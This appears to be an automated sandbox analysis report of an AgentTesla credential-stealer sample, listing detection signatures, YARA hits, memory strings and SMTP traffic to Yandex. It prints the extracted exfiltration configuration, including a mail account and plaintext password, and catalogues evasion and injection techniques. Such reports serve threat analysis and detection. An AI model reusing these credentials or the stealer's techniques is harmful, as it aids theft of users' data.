Play interactive tour

Edit tour

Windows Analysis Report 3NeufRwoxF

Overview

General Information

Sample Name:	3NeufRwoxF (renamed file extension from none to exe)
Analysis ID:	553010
MD5:	891fafcb65f039cefac6701bfb8a9253
SHA1:	e9ca83ec5e9a9264d251a3379d65dd9dfe92a16a
SHA256:	3c6d3aa382ddba97862136aa06c449150810696ef7cb05e7ec0f4ed6895683c4
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Multi AV Scanner detection for dropped file

Machine Learning detection for sample

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

3NeufRwoxF.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\3NeufRwoxF.exe" MD5: 891FAFCB65F039CEFAC6701BFB8A9253)

3NeufRwoxF.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\3NeufRwoxF.exe" MD5: 891FAFCB65F039CEFAC6701BFB8A9253)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "info.superseal@yandex.com", "Password": "Golddigger", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.653816558.0000000000414000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: 3NeufRwoxF.exe PID: 4484	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: 3NeufRwoxF.exe PID: 4828	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: 3NeufRwoxF.exe PID: 4828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
2.0.3NeufRwoxF.exe.415058.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.7.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.23c0000.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.23c0000.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.23c0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.23c0000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3031458.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3031458.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.49d0000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.49d0000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.415058.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.415058.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.400000.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.400000.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.8.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.400000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.415058.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.415058.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3020000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3020000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.400000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.400000.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.6.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.415058.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.1.3NeufRwoxF.exe.415058.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.38d3258.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.38d3258.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.9.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.415058.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.415058.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3020000.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3020000.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3031458.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.3NeufRwoxF.exe.3031458.5.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.9.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.415058.7.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.38d3258.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.3NeufRwoxF.exe.38d3258.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.3NeufRwoxF.exe.400000.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 51 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.0.3NeufRwoxF.exe.400000.4.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "info.superseal@yandex.com", "Password": "Golddigger", "Host": "smtp.yandex.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: 3NeufRwoxF.exe	Virustotal: Detection: 44%			Perma Link
Source: 3NeufRwoxF.exe	ReversingLabs: Detection: 51%

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll

ReversingLabs: Detection: 42%

Machine Learning detection for sample

Show sources

Source: 3NeufRwoxF.exe

Joe Sandbox ML: detected

Source: 2.0.3NeufRwoxF.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.3.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.8.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.2.3NeufRwoxF.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.1.3NeufRwoxF.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.6.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.2.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.0.3NeufRwoxF.exe.400000.5.unpack	Avira: Label: TR/Spy.Gen8

Source: 3NeufRwoxF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: 3NeufRwoxF.exe, 00000000.00000003.649117191.0000000003200000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000000.00000003.649806691.0000000003070000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 3NeufRwoxF.exe, 00000000.00000003.649117191.0000000003200000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000000.00000003.649806691.0000000003070000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_00404A29 FindFirstFileExW,	2_1_00404A29

Source: Joe Sandbox View

IP Address: 77.88.21.158 77.88.21.158

Source: global traffic

TCP traffic: 192.168.2.4:49760 -> 77.88.21.158:587

Source: global traffic

TCP traffic: 192.168.2.4:49760 -> 77.88.21.158:587

Source: 3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: 3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: 3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://MXCHOJ.com
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0h
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://crls.ya
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
Source: 3NeufRwoxF.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 3NeufRwoxF.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ca.cer09
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ycasha2.cer0
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com0.
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730405870.00000000054A7000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
Source: 3NeufRwoxF.exe, 00000002.00000002.735737044.00000000054A9000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730411545.00000000054A9000.00000004.00000001.sdmp	String found in binary or memory: http://yandex.oc
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: http://yandex.ocsp-responder.com03
Source: 3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: 3NeufRwoxF.exe, 00000002.00000002.735720078.000000000549D000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.735652299.0000000005450000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734675386.00000000029EF000.00000004.00000001.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: 3NeufRwoxF.exe, 3NeufRwoxF.exe, 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734128431.0000000000859000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp, 3NeufRwoxF.exe, 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp, 3NeufRwoxF.exe, 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: 3NeufRwoxF.exe, 00000002.00000002.734429027.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: smtp.yandex.com

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404F61

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 2.2.3NeufRwoxF.exe.49d0000.4.unpack, u003cPrivateImplementationDetailsu003eu007b5B80CC66u002dD458u002d4855u002d8E40u002dDE61FFEE2428u007d/u003064B2095u002d1A80u002d43DBu002dB33Eu002dDC28338E94F6.cs

Large array initialization: .cctor: array initializer size 12036

Source: 3NeufRwoxF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403225

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_0040604C	0_2_0040604C
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 0_2_00404772	0_2_00404772
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0040A2A5	2_2_0040A2A5
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_1_0040A2A5	2_1_0040A2A5

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: String function: 00401ED0 appears 46 times
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: String function: 0040569E appears 36 times

Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0078B136 NtQuerySystemInformation,		2_2_0078B136
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Code function: 2_2_0078B105 NtQuerySystemInformation,		2_2_0078B105

Source: 3NeufRwoxF.exe, 00000000.00000003.651181443.000000000331F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000000.00000003.649069074.0000000003186000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000000.00000002.656663064.0000000003020000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe	Binary or memory string: OriginalFilename vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000002.734128431.0000000000859000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000003.730336959.0000000000824000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000000.654698567.0000000000414000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000002.734722737.00000000038D1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000002.734344539.00000000023C0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000002.734912309.00000000049D2000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe
Source: 3NeufRwoxF.exe, 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameRHSOrQoYBuAPkDraNpMdntgxMdPAa.exe4 vs 3NeufRwoxF.exe

Source: 3NeufRwoxF.exe	Virustotal: Detection: 44%
Source: 3NeufRwoxF.exe	ReversingLabs: Detection: 51%

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

File read: C:\Users\user\Desktop\3NeufRwoxF.exe

Jump to behavior

Source: 3NeufRwoxF.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3NeufRwoxF.exe "C:\Users\user\Desktop\3NeufRwoxF.exe"
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process created: C:\Users\user\Desktop\3NeufRwoxF.exe "C:\Users\user\Desktop\3NeufRwoxF.exe"
Source: C:\Users\user\Desktop\3NeufRwoxF.exe	Process created: C:\Users\user\Desktop\3NeufRwoxF.exe "C:\Users\user\Desktop\3NeufRwoxF.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3NeufRwoxF.exe

